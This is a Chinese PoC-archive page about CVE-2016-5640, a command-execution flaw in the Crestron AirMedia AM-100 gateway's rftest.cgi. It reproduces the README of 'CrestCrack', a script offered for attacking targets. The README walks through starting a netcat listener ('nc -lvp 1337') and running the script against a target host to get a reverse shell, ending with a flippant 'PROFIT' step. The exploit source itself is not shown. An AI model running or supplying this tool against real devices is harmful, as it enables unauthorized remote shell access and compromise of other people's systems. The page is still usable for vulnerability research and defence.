关联漏洞
标题:
Crestron AirMedia AM-100 目录遍历漏洞
(CVE-2016-5640)
描述:Crestron AirMedia AM-100是美国Crestron Electronics公司的一款智能家居网关产品。 使用1.2.1及之前版本的固件的Crestron AirMedia AM-100中cgi-bin/rftest.cgi文件中存在目录遍历漏洞。远程攻击者可借助‘ATE_COMMAND’参数中的目录遍历字符‘..’利用该漏洞执行任意命令。
描述
Exploits CVE-2016-5640 / CLVA-2016-05-002 against Crestron AM-100
介绍
# CrestCrack
CrestCrack is a simple script that exploits CVE-2016-5640 / CLVA-2016-05-002 within the Crestron AirMedia AM-100 (v1.1.1.11 - v1.2.1). When supplied with arguments CrestCrack will utilize netcat to create a reverse shell between your target and a netcat listener of your choice.
## Setup:
1. Clone a copy of CrestCrack `git clone https://github.com/vpnguy/CrestCrack`
2. Launch a netcat listener `nc -lvp 1337`
3. Execute CrestCrack against your target with your listener info `./crestcrack.py https://targethost 255.255.255.255 1337`
4. ??????
5. **PROFIT**
###Usage:
**./crescrack.py *[target host] [listener IP] [listener port]***
###Example:
**./crescrack.py https://targethost 123.123.123.123 3311**
## Additional Vulnerability Information:
[Cylance Vulnerability Disclosure](https://github.com/CylanceVulnResearch/disclosures/blob/master/CLVA-2016-05-002.md)
[NIST CVE-2016-5640](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-5640)
## To be added:
- Error handling/bounds checking
- Enhanced argument support
- --help output
文件快照
[4.0K] /data/pocs/a878844fb07b8c514adaadca09a0d6d7fb4429bc
├── [1.4K] crestcrack.py
├── [ 34K] LICENSE.md
└── [1.1K] README.md
0 directories, 3 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。